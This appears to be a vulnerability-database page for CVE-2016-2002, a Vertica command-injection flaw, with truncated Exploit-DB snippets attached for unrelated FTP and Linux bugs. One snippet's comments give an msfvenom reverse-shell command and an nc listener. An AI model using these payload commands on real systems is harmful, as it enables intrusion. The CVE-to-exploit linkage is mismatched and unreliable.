CVE-2016-2002
Published 2016-04-20
Priority: P259 · critical · 9.8 (CVSS 3.0)
Vector: AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
EPSS: 3.09% (86.1th percentile)
The validateAdminConfig handler in the Analytics Management Console in HPE Vertica 7.0.x before 7.0.2.12, 7.1.x before 7.1.2-12, and 7.2.x before 7.2.2-1 allows remote attackers to execute arbitrary commands via the mcPort parameter, aka ZDI-CAN-3417.
Affected
3 ranges
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| opentext | vertica | >= 7.0.0 < 7.0.2.12 | 7.0.2.12 |
| opentext | vertica | >= 7.1.0 < 7.1.2-12 | 7.1.2-12 |
| opentext | vertica | >= 7.2.0 < 7.2.2-1 | 7.2.2-1 |
CVSS provenance
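| Source | Version | Score | Severity | Vector |
|---|---|---|---|---|
| nvd | v3.0 | 9.8 | CRITICAL | CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H |
| nvd | v2.0 | 10.0 | CRITICAL | AV:N/AC:L/Au:N/C:C/I:C/A:C |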
No detection rules found.
Exploit-DB
Freefloat FTP Server 1.0 - 'ABOR' Remote Buffer Overflow
exploitdb·2016-11-01
---
```python
#!/usr/bin/env python
#-*- coding: utf-8 -*-
# Exploit Title: FreeFloat FTP Server BoF ABOR Command
# Date: 29/10/2016
# Exploit Author: Ger
# Software Link: http://www.freefloat.com/software/freefloatftpserver.zip
# Version: 1.0
# Tested on: Windows XP Professional V. 2002 Service Pack 3
# CVE : n/a
import socket
#shellcode with metasploit
#msfvenom -p windows/shell_reverse_tcp LHOST=192.168.74.132 LPORT=443 -b '\x00\x0d\x0a' -f c
#nc -lvp 443
#send the exploit
ret='\x73\x18\x6E\x74' #MSCTF.dll
```
Exploit-DB
FTPShell Client 5.24 - 'Create NewFolder' Local Buffer Overflow
exploitdb·2016-02-04
---
```python
#[+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+]
#[+] Exploit Title: FTPShell Client (Add New Folder) Local Buffer Overflow
#[+] Date: 2/2/2016
#[+]Exploit Author: Arash Khazaei
#[+] Vendor Homepage: www.ftpshell.com
#[+]Software Link: http://www.ftpshell.com/download.htm
#[+] Version: 5.24
#[+] Tested on: Windows XP Professional SP3 (Version 2002)
#[+] CVE : N/A
#[+] introduction : Add New Folder In Remote FTP Server And In Name Input Copy Buffer.txt File content
#[+] or click on Remote Tab Then Click On Create Folder And Copy Buffer.txt In Name Input ...
#[+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+]
#!/usr/bin/python
filename = "buffer.txt"
# Junk A
junk = "A"*452
#
```
Exploit-DB
User-Mode Linux (Linux Kernel 2.4.17-8) - Memory Access Privilege Escalation
exploitdb·2000-08-25
CVE-2002-2016 User-Mode Linux (Linux Kernel 2.4.17-8) - Memory Access Privilege Escalation
---
source: https://www.securityfocus.com/bid/3973/info
User-Mode Linux (UML) is a patch which allows the Linux Kernel to run as a user space process. It is currently available for the Linux operating system. It may be used as an efficient tool for kernel development, as well as for virtual networking, honeypots, and experimentation.
UML does not correctly protect kernel address space from user programs within the UML environment. It may be possible to execute arbitrary code within the kernel and gain root access. Additionally, it may be possible to use this vulnerability to escape the UML environment, leading to local access on the hosting system.
This is a known problem with the current UML implementation.